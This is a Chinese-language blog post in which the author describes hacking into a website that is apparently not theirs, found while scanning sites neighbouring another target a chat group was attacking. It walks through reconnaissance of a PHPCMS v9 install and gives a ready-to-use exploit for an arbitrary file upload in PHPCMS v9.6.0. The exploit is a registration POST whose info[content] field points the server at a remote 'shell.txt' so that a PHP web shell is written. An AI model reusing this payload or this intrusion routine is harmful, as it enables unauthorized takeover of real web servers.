距離上一次寫博客已經過去很長一段時間了,最近也一直在學習,只是並沒有分享出來 越來越發現會的東西真的太少了,繼續努力吧。
中午的時候遇到了一個站點,看到群里好多人都在搞,自己就也去試了試,拿下來后發現不能跨目錄,所以掃了一下旁站,就看上了標題中的目標站。
目標站: iis7.0+php+mysql+win NT
/robots.txt 發現如下信息:
# # robots.txt for PHPCMS v9 # User-agent: * Disallow: /caches Disallow: /phpcms Disallow: /install Disallow: /phpsso_server Disallow: /api Disallow: /admin.php
找到了后台登陸頁面,先試了一下弱口令,發現登陸不上。那接下來就根據收集到的信息來想方法吧。
既然是iis7.0的 那就在前台隨便找了個圖片 http://url/images/1.jpg/*.php 發現提示No input file specified.說明不存在解析漏洞
沒有解析漏洞的話那就要換一個思路了,沒有注入 后台不是弱口令,后台暫時是進不去了,那只能在前台找上傳點了,掃了一下目錄 也沒發現什么可利用的 於是就把想法放在用戶注冊上了,起初是想着注冊一個賬號,抓包上傳頭像,看看能不能繞過上傳限制,結果發現還是不行。 emmm.....
正常是感覺沒路了,其實還是自己學的知識少,知識面不夠廣所以思路局限。(感慨一下要學的還是很多!)
后來想起來還有一個信息 phpcms 這個還有用到呢,其實一般情況下首先考慮的就是有沒有cms 0day,可能沒睡好腦子壞掉了 差點給忘記了。
去查了一下,找到了phpcms v9.6.0的任意文件上傳的0day 接下來就好辦了。
具體方法如下:
首先我們在服務器上上傳一個shell.txt內容為:
<?php phpinfo();?>
並且可以訪問:http://www.baidu.com/shell.txt
然后在目標網站注冊會員,打開burp,截斷數據包,把post內容更改為
siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info[content]=<img src=http://www.baidu.com/shell.txt?.php#.jpg>&dosubmit=1&protocol=
利用repeater模塊 查看回顯包 得到shell地址。
具體的漏洞分析 P牛的博客里有,這里分享鏈接就好了